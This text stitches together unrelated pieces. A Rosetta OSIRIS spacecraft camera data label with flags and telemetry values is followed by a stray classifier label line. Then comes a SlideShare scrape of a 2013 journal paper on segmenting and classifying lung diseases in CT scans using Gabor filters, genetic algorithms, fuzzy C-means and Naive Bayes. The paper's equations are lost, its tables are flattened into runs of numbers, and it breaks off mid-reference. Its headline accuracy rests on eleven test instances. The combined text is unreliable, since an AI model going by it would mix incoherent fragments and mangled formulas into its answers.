GROUP = SR_PROCESSING_FLAGS BAD_PIXEL_REPLACEMENT_FLAG = FALSE ROSETTA:ADC_OFFSET_CORRECTION_FLAG = TRUE ROSETTA:BIAS_CORRECTION_FLAG = TRUE ROSETTA:COHERENT_NOISE_CORRECTION_FLAG = FALSE DARK_CURRENT_CORRECTION_FLAG = FALSE ROSETTA:FLATFIELD_HI_CORRECTION_FLAG = TRUE ROSETTA:BAD_PIXEL_REPLACEMENT_GROUND_FLAG = TRUE ROSETTA:FLATFIELD_LO_CORRECTION_FLAG = TRUE ROSETTA:EXPOSURETIME_CORRECTION_FLAG = TRUE ROSETTA:RADIOMETRIC_CALIBRATION_FLAG = TRUE ROSETTA:GEOMETRIC_DISTORTION_CORRECTION_FLAG = TRUE ROSETTA:REFLECTIVITY_NORMALIZATION_FLAG = TRUE ROSETTA:INFIELD_STRAYLIGHT_CORRECTION_FLAG = FALSE ROSETTA:OUTFIELD_STRAYLIGHT_CORRECTION_FLAG = FALSE END_GROUP = SR_PROCESSING_FLAGS /* SHUTTER CONFIG */ GROUP = SR_SHUTTER_CONFIG ROSETTA:PROFILE_ID = "4294967295" ROSETTA:CONTROL_MASK = "16#39#" ROSETTA:TESTMODE_FLAG = FALSE ROSETTA:ZEROPULSE_FLAG = TRUE ROSETTA:LOCKING_ENCODER_FLAG = TRUE ROSETTA:CHARGEMODE_ID = SLOW ROSETTA:SHUTTER_OPERATION_MODE = "NORMAL" ROSETTA:NUM_OF_EXPOSURES = 1 END_GROUP = SR_SHUTTER_CONFIG /* SHUTTER STATUS */ GROUP = SR_SHUTTER_STATUS ROSETTA:STATUS_MASK = "16#6000600#" ROSETTA:ERROR_TYPE_ID = SHUTTER_ERROR_NONE END_GROUP = SR_SHUTTER_STATUS /* DATA COMPRESSION AND SEGMENTATION */ GROUP = SR_COMPRESSION ROSETTA:LOST_PACKETS = (0, 0, 0, 0) ROSETTA:SEGMENT_X = (0, 512, 0, 512) ROSETTA:SEGMENT_Y = (0, 0, 512, 512) ROSETTA:SEGMENT_W = (512, 512, 512, 512) ROSETTA:SEGMENT_H = (512, 512, 512, 512) ROSETTA:ENCODING = (SPIHT_LIFT, SPIHT_LIFT, SPIHT_LIFT, SPIHT_LIFT) ROSETTA:COMPRESSION_RATIO = ( 2.5, 2.5, 2.5, 2.5) ROSETTA:LOSSLESS_FLAG = (TRUE, TRUE, TRUE, TRUE) ROSETTA:SPIHT_PYRAMID_LEVELS = (8, 8, 8, 8) ROSETTA:SPIHT_THRESHOLD_BITS = (11, 11, 13, 13) ROSETTA:SPIHT_MEAN = (307, 318, 316, 332) ROSETTA:SPIHT_MEAN_SHIFT = (0, 0, 0, 0) ROSETTA:SPIHT_WAVE_LEVELS = (4, 4, 4, 4) PIXEL_AVERAGING_WIDTH = (1, 1, 1, 1) PIXEL_AVERAGING_HEIGHT = (1, 1, 1, 1) ROSETTA:SMOOTH_FILTER_ID = (NONE, NONE, NONE, NONE) ROSETTA:SQRT_FILTER_FLAG = (FALSE, FALSE, FALSE, FALSE) ROSETTA:SQRT_GAIN = ( 0.0, 0.0, 0.0, 0.0) END_GROUP = SR_COMPRESSION /* SUBSYSTEM HARDWARE IDENTIFICATION */ GROUP = SR_HARDWARE_CONFIG ROSETTA:DATA_PROCESSING_UNIT_ID = FS ROSETTA:POWER_CONVERTER_ID = FS ROSETTA:MOTOR_CONTROLLER_ID = FS ROSETTA:NAC_CCD_READOUT_BOX_ID = FM ROSETTA:WAC_CCD_READOUT_BOX_ID = FM ROSETTA:NAC_CAMERA_ID = FM ROSETTA:WAC_CAMERA_ID = FM END_GROUP = SR_HARDWARE_CONFIG /* SYSTEM HEATER STATUS */ GROUP = SR_HEATER_STATUS ROSETTA:CCD_HEATER_POWER = 0.000 ROSETTA:NAC_MAIN_FDM_POWER = 1.459 ROSETTA:NAC_RED_FDM_POWER = 0.000 ROSETTA:NAC_MAIN_PPE_POWER = 3.943 ROSETTA:NAC_RED_PPE_POWER = 0.000 ROSETTA:WAC_MAIN_STR1_POWER = 2.052 ROSETTA:WAC_RED_STR1_POWER = 0.000 ROSETTA:WAC_MAIN_STR2_POWER = 2.314 ROSETTA:WAC_RED_STR2_POWER = 0.000 END_GROUP = SR_HEATER_STATUS /* POWER CONVERTER SWITCH STATUS */ GROUP = SR_SWITCH_STATUS ROSETTA:WAC_SHUTFAILSAFEEXEC_FLAG = OFF ROSETTA:NAC_SHUTFAILSAFEEXEC_FLAG = OFF ROSETTA:WAC_DOORFAILSAFEEXEC_FLAG = OFF ROSETTA:NAC_DOORFAILSAFEEXEC_FLAG = OFF ROSETTA:PCM_PASSCTRLACTIVE_FLAG = OFF ROSETTA:WAC_SHUTFAILSAFE_ENAB_FLAG = OFF ROSETTA:WAC_SHUTTERPOWER_FLAG = ON ROSETTA:WAC_CCDANNEALHEATER_FLAG = OFF ROSETTA:WAC_CRB_PRIMEPOWER_FLAG = ON ROSETTA:NAC_SHUTFAILSAFE_ENAB_FLAG = OFF ROSETTA:NAC_SHUTTERPOWER_FLAG = ON ROSETTA:NAC_CCDANNEALHEATER_FLAG = OFF ROSETTA:NAC_CRB_PRIMEPOWER_FLAG = ON ROSETTA:WAC_STRUCTUREHEATER_R_FLAG = OFF ROSETTA:WAC_STRUCTUREHEATER_M_FLAG = OFF ROSETTA:WAC_RED_CALLAMP_FLAG = OFF ROSETTA:WAC_MAIN_CALLAMP_FLAG = OFF ROSETTA:WAC_DOORFAILSAFE_ENAB_FLAG = OFF ROSETTA:NAC_IFPLATEHEATER_R_FLAG = OFF ROSETTA:NAC_IFPLATEHEATER_M_FLAG = OFF ROSETTA:NAC_RED_CALLAMP_FLAG = OFF ROSETTA:NAC_MAIN_CALLAMP_FLAG = OFF ROSETTA:NAC_DOORFAILSAFE_ENAB_FLAG = OFF ROSETTA:MCB_RED_MOTORPOWER_FLAG = OFF ROSETTA:MCB_MAIN_MOTORPOWER_FLAG = ON ROSETTA:MCB_FLAG = MAIN ROSETTA:PRIMARY_POWER_RAIL_FLAG = REDUNDANT END_GROUP = SR_SWITCH_STATUS /* POWER SYSTEM STATUS */ GROUP = SR_POWER_STATUS ROSETTA:V_28_MAIN = 3.5 ROSETTA:V_28_REDUNDANT = 27.9 ROSETTA:V_5 = 5.2 ROSETTA:V_3 = 3.4 ROSETTA:V_15 = 15.0 ROSETTA:V_M15 = -15.0 ROSETTA:V_NAC_REFERENCE = -9.9 ROSETTA:V_WAC_REFERENCE = -10.0 ROSETTA:CAMERA_V_24 = 25.5 ROSETTA:CAMERA_V_8 = 8.4 ROSETTA:CAMERA_V_M12 = -12.4 ROSETTA:CAMERA_V_5_ANALOG = 5.4 ROSETTA:CAMERA_V_5_DIGITAL = 5.3 ROSETTA:CAMERA_V_M5 = -5.3 ROSETTA:I_28_MAIN = -79.6 ROSETTA:I_28_REDUNDANT = 916.5 ROSETTA:I_5 = 1778.5 ROSETTA:I_3 = 129.7 ROSETTA:I_15 = 119.3 ROSETTA:I_M15 = 61.6 ROSETTA:CAMERA_I_24 = 14.7 ROSETTA:CAMERA_I_8 = 12.3 ROSETTA:CAMERA_I_M12 = 63.2 ROSETTA:CAMERA_I_5_ANALOG = 94.6 ROSETTA:CAMERA_I_5_DIGITAL = 124.5 ROSETTA:CAMERA_I_M5 = 64.4 END_GROUP = SR_POWER_STATUS /* CALIBRATED TEMPERATURES */ GROUP = SR_TEMPERATURE_STATUS ROSETTA:T_MAIN_PCM = 293.9 ROSETTA:T_REDUNDANT_PCM = 296.0 ROSETTA:T_WAC_STRUCTURE_MAIN_1 = 285.2 ROSETTA:T_WAC_STRUCTURE_REDUNDANT_1 = 285.7 ROSETTA:T_WAC_STRUCTURE_MAIN_2 = 285.2 ROSETTA:T_WAC_STRUCTURE_REDUNDANT_2 = 285.7 ROSETTA:T_WAC3 = 287.8 ROSETTA:T_WAC4 = 286.5 ROSETTA:T_WAC_WHEEL_MOTOR_1 = 282.2 ROSETTA:T_WAC_WHEEL_MOTOR_2 = 282.2 ROSETTA:T_WAC_DOOR_MOTOR = 283.5 ROSETTA:T_NAC_CCD_VIA_MCB = 203.5 ROSETTA:T_WAC_CCD_VIA_MCB = 172.0 ROSETTA:T_NAC_WHEEL_MOTOR_1 = 254.0 ROSETTA:T_NAC_WHEEL_MOTOR_2 = 254.8 ROSETTA:T_NAC_DOOR_MOTOR = 252.2 ROSETTA:T_NAC_DOOR_IF_MAIN = 247.9 ROSETTA:T_NAC_MIRROR_2 = 225.8 ROSETTA:T_NAC_PPE_IF_REDUNDANT = 255.0 ROSETTA:T_NAC_DOOR_IF_REDUNDANT = 247.9 ROSETTA:T_NAC_PPE_IF_MAIN = 255.0 ROSETTA:T_NAC_MIRROR_1_AND_3 = 225.0 ROSETTA:T_DSP_MAIN = 302.8 ROSETTA:T_DSP_REDUNDANT = 294.9 ROSETTA:T_BOARD_CONTROLLER = 298.4 ROSETTA:T_BOARD_DRIVER = 296.4 ROSETTA:CAMERA_TCCD = 167.0 ROSETTA:CAMERA_T_SENSORHEAD = 289.1 ROSETTA:CAMERA_T_ADC_1 = 295.7 ROSETTA:CAMERA_T_ADC_2 = 296.9 ROSETTA:CAMERA_T_SHUTTER_MOTOR_1 = 284.0 ROSETTA:CAMERA_T_SHUTTER_MOTOR_2 = 284.6 ROSETTA:CAMERA_T_POWER_CONVERTER = 318.0 ROSETTA:CAMERA_T_DOSIMETER = 291.6 END_GROUP = SR_TEMPERATURE_STATUS /* RADIATION ENVIRONMENT */ GROUP = SR_RADIATION_STATUS ROSETTA:CAMERA_DOSIS = 496.9 ROSETTA:SREM_PROTONS_GT_20MEV = 0 ROSETTA:SREM_PROTONS_50_TO_70MEV = 0 ROSETTA:SREM_ELECTRONS_LT_2MEV = 0 END_GROUP = SR_RADIATION_STATUS OBJECT = JPEG_DOCUMENT DOCUMENT_NAME = "W20150127T151250683ID4BF21.JPG" PUBLICATION_DATE = 2018-11-15 DOCUMENT_TOPIC_TYPE = "BROWSE IMAGE" DESCRIPTION = "BROWSE IMAGE W20150127T151250683ID4BF21" INTERCHANGE_FORMAT = BINARY DOCUMENT_FORMAT = "JPG" END_OBJECT = JPEG_DOCUMENT END
__label__pos
0.996339
Ol3425172524 361 views Published on International Journal of Engineering Research and Applications (IJERA) is an open access online peer reviewed international journal that publishes research and review articles in the fields of Computer Science, Neural Networks, Electrical Engineering, Software Engineering, Information Technology, Mechanical Engineering, Chemical Engineering, Plastic Engineering, Food Technology, Textile Engineering, Nano Technology & science, Power Electronics, Electronics & Communication Engineering, Computational mathematics, Image processing, Civil Engineering, Structural Engineering, Environmental Engineering, VLSI Testing & Low Power VLSI Design etc. Published in: Technology, Health & Medicine 0 Comments 0 Likes Statistics Notes • Be the first to comment • Be the first to like this No Downloads Views Total views 361 On SlideShare 0 From Embeds 0 Number of Embeds 86 Actions Shares 0 Downloads 6 Comments 0 Likes 0 Embeds 0 No embeds No notes for slide Ol3425172524 1. 1. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2517 | P a g e Advanced Segmentation Techniques Using Genetic Algorithm for Recognition of Lung Diseases from CT Scans of Thorax C. Bhuvaneswari1 , P. Aruna2 , D. Loganathan3 1 (Head, Department of Computer Science, Theivanai Ammal College For Women (Autonomous), Villupuram,India) 2 (Professor, Department of Computer Science and Engineering, Annamalai University, Chidambaram,India) 3 (Professor &Head, Department of Computer Science and Engineering, Pondicherry Engineering College, Puducherry,India) ABSTRACT In this study, texture based segmentation and recognition of the lung diseases from the computed tomography images are presented. The texture based features are extracted by Gabor filtering, feature selection techniques such as Information Gain, Principal Component Analysis, correlation based feature selection are employed with Genetic algorithm which is used as an optimal initialisation of the clusters. The feature outputs are combined by watershed segmentation and the fuzzy C means clustering. The images are recognized with the statistical and the shape based features. The four classes of the dataset of lung diseases are considered and the training and testing are done by the Naive Bayes classifier to classify the datasets. Results of this work show an accuracy of above 90% for the correlation based feature selection method for the four classes of the dataset. Keywords – Features, Genetic Algorithm, Image Segmentation, Texture, Training. I. INTRODUCTION Lung diseases are leading cause for the most disabilities and death in the world. Radiologist diagnosis the chest CT and the success of the radiotherapy depend on the dosage of the drugs given and the doses that affect the normal tissues surrounding areas. The chest CT shows the first important modality of the assessment of the diseases. The CT image along with the symptoms of the diseases will give detailed assessment about the lung diseases. The major causes of the lung diseases are caused by smoking, inhaling the drugs, smoke and allergic materials. The lung diseases are generally identified by the symptoms and the regular dosage of the antibiotics may cure the disease. If the antibiotics does not respond to the disease the computed tomography images assists in detecting the severarity of the lung diseases. There are many types of the disease that causes the lung infection such as inflammatory lung diseases, chronic obstructive pulmonary disease(COPD),Emphysema, Chronic Bronchitis, pleural effusion,Intersitial lung diseases and lung carcinoma. The datasets of the lung diseases considered in this study are the large cell lung carcinoma and small cell lung carcinoma. Lung cancer or lung carcinoma is currently the most frequently diagnosed major cancer and the most common cause of cancer mortality in males worldwide. This is largely due to the effects of cigarette smoke. An international system of tumor classification is important for consistency in patient treatments and to provide the basis of epidemiological and biological studies. In developing this classification, pathologists have tried to adhere to the principles of reproducibility, clinical significance and simplicity, and to minimize the number of unclassifiable lesions. Most of this classification is based on the histological characteristics of tumors seen in surgical or needle biopsy, and is primarily based on light microscopy, although immune histochemistry and electron microscopy findings are provided when necessary. The methodology used in this work defined that the images are pre-processed for the removal of the noises and contrast enhancement is done for obtaining the enhanced images. Feature extraction is frequently used as a preprocessing step to machine learning where the Gabor filter is used in texture analysis. The feature selection method such as the Information Gain, correlation based feature selection, Principal Component Analysis with optimisation of the genetic algorithm are done. The feature outputs are combined by watershed segmentation and the fuzzy C means clustering combines the data that belongs to two or more clusters. The Naive Bayes classifier is used to classify the images and the results are shown with the performance measures. The paper is organized as follows: Section 2 deals with the related works available in literature. Section 3 explains the methodology. In the section 4 experimental setup is detailed and section 5 deals with the performance analysis and section 6 deals with the findings of the study. 2. 2. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2518 | P a g e II. PREVIOUS STUDIES AND RELATED WORKS Manish Kakar et al., [1] proposed a method based upon the texture features, as extracted from Gabor filtering, the FCM can be used for segmentation of CT of thorax given that the cluster centres are initialized by using a Genetic Algorithm. From the segmentation results, the accuracy of delineation was seen to be above 90%.For automatically recognizing the segmented regions, an average sensitivity of 89.48%was achieved by combining cortex-like, shape and position-based features in a Simple SVM classifier. Ribeiro, et al., [2] proposed StARMiner (Statistical Association Rule Miner) that aims at identifying the most relevant features from those extracted from each image, taking advantage of statistical association rules. The proposed mining algorithm finds rules involving the attributes that discriminate medical image the most. The feature vectors condense the texture information of segmented images in just 30 features. Bhuvaneswari et al., [3] proposed to extract features in the frequency domain using Walsh Hadamard transform and use FP-Growth association rule mining to extract features based on confidence. The extracted features are classified using Naïve Bayes and CART algorithms and the proposed method‟s classification accuracy measured. Investigate the efficacy of feature selection and reduction using Association Rule Mining (ARM) on medical images. Naïve Bayes and Classification and Regression Tree (CART) classifiers were used for evaluating the accuracy of proposed method. Uppaluri et al. [4] have developed a general system for regional classification by using small areas that were classified into one of the six categories based upon 15 statistical and fractal texture features. Shyu etal. [5] have developed a system that retrieves reference cases similar to the case at hand from a proven database. In their approach they have combined global and anatomical knowledge, combining features from several pathological regions and anatomical indicators per slice. The regions are however manually delineated rather then automatically detected. In all the studies mentioned above, some sort of grid over slices/ROI marking or marked pathologies beforehand are needed for training, thus a supervised approach is used. III. METHODOLOGY The methods employed for the processing of the work is dealt in detail in this section. 3.1 Preprocessing and feature extraction: The removal of the noise and contrast enhancement is done by preprocessing .The noise of the images is removed by the median filter. The following features are extracted from the lung disease CT images. They are Name Description Orientation The angle between the x-axis and the major axis of the ellipse Mean Mean of the method response from the region Variance Variance of the method response from the region CentroidX X coordinate value of the centroid of the patch CentroidY Y coordinate value of the centroid of the patch Area Area of the patch Entropy Average, global information content of an image in terms of average bits per pixel. Contrast difference between the lightest and Difference darkest areas. Homogeneity The state or quality of being homogeneous, biological or other similarities within a group. The other extracted features are median, standard deviation, root mean square, root mean square also known as the quadratic mean, is a statistical measure of the magnitude of a varying quantity. Histogram is used to graphically summarize and display the distribution of a process data set. The Gabor filter is used to extract the texture features from the preprocessed image. The coding is implemented using the Matlab. The following are the steps for feature extraction  Creates a flat, disk-shaped structuring element, of the radius R which specifies the radius which is a nonnegative integer.  Performs the morphological bottom-hat filtering on the greyscale or binary input image, which returns the filtered image.  The structuring element returned by the strel function must be a single structuring element object, not an array containing multiple structuring element objects.  The Top-hat filtering and bottom-hat filtering are used together to enhance contrast in an image.  Add the original image and the top-hat filtered image, and then subtract the bottom-hat filtered image. By applying the above techniques the noise will be removed and contrast enhancement will be done. 3. 3. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2519 | P a g e Fig 1. Original image Fig 2. Preprocessed image 3.2 Gabor kernel filters A complex Gabor filter is defined as the product of a Gaussian kernel times a complex sinusoid. The Gabor filter is widely used in image processing, especially in texture analysis. The function is based on „Uncertainty Principle‟ and can provide accurate time-frequency location . The Gabor filters has optimal localization properties in both spatial and frequency domain. The Gabor function is a harmonic oscillator, made of sine wave enclosed in a Gaussian envelope. A 2-D Gabor filter over the image domain(x,y) is given by             2 2 0 0 2 2 0 0 0 0 , exp 2 2 Xexp 2 x y x x y y G x y i u x x v y y                   (1) Where     0 0 0 0 2 2 0 0 0 0 0 0 , is location in the image, , specifies modulation which has frequency and orientation arctan and are standard deviation of Gaussian envelopex y x y u v u v v u             Gabor filter calculates all the convolutions of the input image IMG with the Gabor-filter kernels for all combinations of orientations and all phase-offsets with the input image IMG. The result is a 4- dimensional matrix of which the first two indices are the image-coordinates, the third index is the phase offset, the fourth index is the orientation. The following are the steps for the Gabor kernel calculation  Calculate the ratio σ / λ from bandwidth then test if the σ / λ ratio.  Creation of two (2n+1) x (2n+1) matrices x and y that contain the x- and y-coordinates of a square 2D-mesh.  The wave vector of the Gabor function is calculated.  Pre compute coefficients of the function. Fig 3. Gabor kernel filters images 3.3 Feature selection Feature selection deals with selecting a subset of features, among the full features, that shows the best performance in classification accuracy. The best subset contains the least number of dimensions that most contribute to accuracy. This is an important stage in preprocessing. Filter techniques assess the relevance of features by looking only at the intrinsic properties of the data. Filter techniques can easily scale to very high-dimensional datasets, they are computationally simple and fast, and they are independent of the classification algorithm. Three feature selection methods such as Information Gain, correlation based feature selection, Principal Component Analysis are employed 3.3.1 Information gain One of the filter based univariate model search which is Fast, Scalable, Independent of the Classifier is Information gain method. It measures the number of bits of information obtained for category prediction, it measures the decrease in entropy when the feature is given or absent. The more space a piece of information takes to encode, the more entropy it occupies. The information gain of an attribute is measured by the reduction in entropy IG(X) = H(D) − H(D|X). The greater the decrease in entropy when considering attribute X individually, the more significant feature X is for prediction. The output of the Gabor kernel filter is given as an input where the REPTree is created. The REPTree is a fast decision tree learner which builds a decision/regression tree using information gain as the splitting criterion, and prunes it using reduced error 4. 4. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2520 | P a g e pruning. It only sorts values for values for numeric attributes once. 3.3.2 Correlation-based feature selection (CFS): Another filter based multivariate model search which is Models feature dependencies, Independent of the classifier, better computational complexity than wrapper methods is correlation based feature selection. CFS searches feature subsets according to the degree of redundancy among the features. The evaluator aims to find the subsets of features that are individually highly correlated with the class but have low inter-correlation. Correlation coefficients are used to estimate correlation between subset of attributes and class, as well as inter- correlations between the features. CFS is used to determine the best feature subset and is usually combined with search strategies such as forward selection, backward elimination, bi- directional search, best-first search and genetic search.CFS first calculates a matrix of feature-class and feature-feature correlations from the training data. Equation for CFS is given. (2) Where rzc is the correlation between the summed feature subsets and the class variable k is the number of subset features rzi is the average of the correlations between the subset features an the class variable rii is the average inter-correlation between subset features. The output of the Gabor kernel filter is given as an input where the numeric attributes are taken and the mean, standard deviation, weighted sum, precision of the attributes are calculated and the summary of the instances is calculated. 3.3.3 Principal Component Analysis (PCA) PCA method is a global feature selection algorithm which identifies patterns in data, and expresses the data in such a way as to highlight their similarities and differences. It is a way to reduce the dimension of a space that is represented in statistics of variables (xi, i = 1,2…. n) which mutually correlated with each other . PCA algorithm can be used to reduce noise and extract features or essential characteristics of data before the classification process. The steps in the PCA algorithm are: a) Create a matrix [X1, X2, .... Xm] which representing N2 Xm data matrix. Xi is the image of size N x N, where N2 is the total pixels of the image dimensions and m is the number of images to be classified. b) Use the following equation to calculate the average value of all images (3) c) Calculated the difference matrix (4) d) Use the difference matrix obtained previously to generated the covariance matrix to obtain the correlation matrix (5) e) Use the correlation matrix to evaluate the eigenvector (6) Where ǿ is orthogonal eigenvector matrix, λ is the eigenvalue diagonal matrix with diagonal elements f) If Φ is a feature vector of the sample image X, then : (7) With feature vector y is the n-dimensional. The output of the Gabor kernel filter is given as an input where the numeric attributes are taken and the mean, standard deviation, weighted sum, precision of the attributes are calculated and the summary of the instances is calculated. 3.4 Genetic algorithm based Initialization Genetic Algorithm (GA) is a well-known randomized approach. It is a particular class of evolutionary algorithms that makes use of techniques inspired by evolutionary biology such as inheritance, mutation, selection, and crossover. In feature selection problems, each feature subset is represented by a binary string [13]. 1 of N th bit means that the feature set contained feature Xn . A fitness function is a particular type of objective function that quantifies the optimality of a solution in a genetic algorithm. The wrapper approach is used in the experiment that will measure fitness function by the accuracy of learning algorithms. A genetic algorithm mainly composed of three operators: selection, crossover, and mutation. In selection, a good string is selected to breed a new generation, crossover combines good strings to generate better offspring and mutation alters a string locally to maintain genetic diversity from one generation of a population of chromosomes to the next. In each generation, the population is evaluated and tested for termination of the algorithm. If the termination criterion is not satisfied, the population is operated upon by the three GA operators and then re- evaluated. The GA cycle continues until the termination criterion is reached. In feature selection, Genetic Algorithm is used as a random selection 5. 5. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2521 | P a g e algorithm, Capable of effectively exploring large search spaces, which is usually required in case of attribute selection. For instance; if the original feature set contains N number of features, the total number of competing candidate subsets to be generated is 2N, which is a huge number even for medium-sized N. The genetic algorithm approach is used along with the feature selection techniques where the feature subsets are reduced to the maximum to obtain the optimal solution. The purpose of using genetic algorithm in the feature selection methods in this study is that the huge datasets are reduced to the optimal size for appropriate segmentation of the images. The output obtained in the feature selection is then clustered by the fuzzy C means clustering. 3.5 Fuzzy c means clustering Fuzzy clustering methods allow the pixel to belong to several clusters simultaneously, with different degrees of membership. The measure of dissimilarity in FCM is given by the squared distance between each data point and the cluster centre, i.e. the Euclidean distance between them and the distance is weighted by the power of the membership degree at that data point.The fuzzy c-means algorithm is very similar to the k-means algorithm:  Choose a number of clusters.  Assign randomly to each point coefficients for being in the clusters.  Repeat until the algorithm has converged (that is, the coefficients' change between two iterations is no more than , the given sensitivity threshold) :  Compute the centroid for each cluster, using the formula above.  For each point, compute its coefficients of being in the clusters, using the formula above.  The algorithm minimizes intra-cluster variance as well, but has the same problems as k-means; the minimum is a local minimum, and the results depend on the initial choice of weights. 3.6 segmentation Image segmentation is the process of dividing an image into multiple parts which is typically used to identify objects or other relevant information in digital images. There are many different ways to perform image segmentation including Thresholding methods such as Otsu‟s method, Clustering methods such as K-means and principle components analysis, Transform methods such as watershed ,Texture methods such as texture filters. Clustering method such as K-Means is used to cluster the coarse image data. The steps are  Read the Image by Inputting Colour Image.  Convert Image from RGB Color Space to L*a*b* Colour Space and calculate the Number of Bins for coarse representation.  The Window size for histogram processing and the Number of classes are given.  Classify the Colours in a*'b*' Space Using K- Means Clustering label  Using the Results from KMEANS every Pixel in the Image create Images that Segment the H&E Image by Color.  Segment the disease into a Separate Image Output Segmented Image. The watershed transform finds "catchment basins" and "watershed ridge lines" in an image by treating it as a surface where light pixels are high and dark pixels are low. Segmentation using the watershed transform identifies or mark foreground objects and background locations. Marker-controlled watershed segmentation follows this procedure: 1. Compute a segmentation function: The dark regions of the images are the objects that need to be segmented. Read in the Color Image and Convert it to Grayscale. Use the Gradient Magnitude as the Segmentation Function 2. Mark foreground objects: These are connected blobs of pixels within each of the objects. 3. Compute background markers: These are pixels that are not part of any object. 4. Modify the segmentation function so that it only has minima at the foreground and background marker locations. 5. Compute the watershed transform of the modified segmentation function and visualize the Result. Fig 4. Segmented images 3.7 classifier Bayesian classifiers assign the most likely class to a given example described by its feature vector. Naïve Bayes is used for classifying the extracted features in this study. The extracted features are classified to the most likely class. Learning in Naïve Bayes is simplified by assuming that the features are independent for a given class. The feature is classified as shown in equation (3): (8) Where X=(X1,…, Xn) is the feature vector and C is a class. The choice of choosing this classifier is the feature extraction techniques used in this study 6. 6. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2522 | P a g e prefers a suitable classifier that handles all type of value i.e., univariate wrapper, multivariate values and PCA method. The experiments and results shows the results of the work done by the classifier. IV. EXPERIMENT AND RESULTS In order to prepare the image for segmentation, pre-processing of the image was done by contrast enhancement and median filtering. Median filter was used for noise removal. Contrast enhancement was performed. The number of features reduced by feature selection methods with Genetic algorithm based Initialization for the optimization of results. Reducing the number of features of dataset is important .All methods were successful in reducing the number of features. The Fuzzy c means clustering is done to cluster the images is done and segmentation of the images are done. The classification accuracy of datasets with 10-fold cross validation for finding the accuracy of the images are computed. V. PERFORMANCE ANALYSIS The correctly and incorrectly classified instances show the percentage of test instances. The percentage of correctly classified instances is often called accuracy or sample accuracy. Kappa is a chance-corrected measure of agreement between the classifications and the true classes. It is calculated by taking the agreement expected by chance away from the observed agreement and dividing by the maximum possible agreement. A value greater than zero means that the classifier is doing better than chance. The mean absolute error is the sum over all the instances and their AbsErrorPerInstance divided by the number of instances in the test set with an actual class label. MeanAbsErr = Sum(AbsErrPerInstance) / number of instances with class label. Root mean squared error, Relative absolute error, Root relative squared error are used to assess performance when the task is numeric prediction. Root relative squared error is computed by dividing the Root mean squared error by predicting the mean of the target values .Therefore, smaller values are better and values > 100% indicate a scheme is doing worse than just predicting the mean .Coverage of cases and Mean relative region size shows the numeric level of the cases which gives absolute results. Table 1 :Comparative Study and Summary of the classification of the images using classifier. 5.1 Performance measures The above evaluation is done for finding the appropriate result for the methods employed in this study. The True Positive (TP) rate is the proportion of examples which were classified as class x, among all examples which truly have class x.The False Positive (FP) rate is the proportion of examples which were classified as class x, but belong to a different class, S. N o Evaluation of testing instances using Naive Bayes classifier Feature selection methods (in percentage) Correlation based feature selection Informatio n Gain Principal Compon ent Analysis 1 Correctly Classified Instances 10 (90.91) 6 (54.55) 6 (54.55) 2 Incorrectly Classified Instances 1 (9.09) 5 (45.45) 5 (45.45) 3 Kappa statistic 0.8493 0.375 0.3529 4 Mean absolute error 0.0455 0.3176 0.2845 5 Root mean squared error 0.2132 0.3989 0.5007 6 Relative absolute error 12.2596 86.4985 78.057 7 Root relative squared error 48.4879 93.096 117.9506 8 Coverage of cases (0.95 level) 90.9091 90.9091 54.5455 9 Mean relative region size (0.95 level) 25 88.6364 31.8182 7. 7. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2523 | P a g e among all examples which are not of class x.The Precision is the proportion of the examples which truly have class x among all those which were classified as class x. Table 2 . Detailed Performance Accuracy for classes using Naive bayes classifier for Correlation based feature selection, Information Gain, Principal Component Analysis TP Rate FP Rate Precision Clas s C1 C2 C3 C1 C2 C3 C1 C2 C3 1 0.67 1 0.17 0.13 0.63 0.83 0.67 0.38 1 0.5 0.5 0.75 0 0.29 0 1 0.5 1 2 0 0 0 0 0 0 0 0 0 3 1 1 0 0 0.22 0 1 0.5 0 4 0.91 0.55 0.55 0.08 0.18 0.17 0.92 0.46 0.47 Weigh ted avg. Recall F-Measure ROC Area ClassC1 C2 C3 C1 C2 C3 C1 C2 C3 1 0.67 1 0.91 0.67 0.55 0.92 0.83 0.75 1 0.5 0.5 0.75 0.67 0.5 0.86 0.64 0.61 1 2 0 0 0 0 0 0 0 0.58 0.7 3 1 1 0 1 0.67 0 1 0.9 0.38 4 0.91 0.55 0.55 0.90 0.49 0.46 0.90 0.7 0.46 Weig hted avg Where C1- Correlation based feature selection C2- Information Gain C3- Principal Component Analysis VI. CONCLUSION The accuracy was found to be 90.91%, 54.55% and 54.55% for correlation based feature selection, information gain, principal component analysis methods with genetic coding respectively. For automatically recognizing the segmented regions, the naive Bayes classifier is used. Performance measure shows the Correlation based feature selection more accurate results than the other two methods. VII. ACKNOWLEDGEMENT We would like to take this opportunity to thank Radiologist Dr. Ramesh Kumar M.D.,(R.D) ,Professor and Head, Department of Radiology Sri Manakula Vinayagar Medical college and Hospital Madagadipet for anonymizing the Dicom Images so that they could be used for analysis for providing patient database and helpful discussions regarding the lung diseases. References [1] Manish Kakara, Dag Rune Olsen, “Automatic segmentation and recognition of lungs and lesion from CT scans of thorax “, IEEE transactions on Computerized Medical Imaging and Graphics ,33 (2009) 72–82 [2] Ribeiro, M. X.; Balan, A. G. R.; Felipe, J. C.; Traina, A. J. M.; Traina Jr., C.” Mining statistical association rules to select the most relevant medical image features.” ,First International Workshop on Mining Complex Data (IEEE 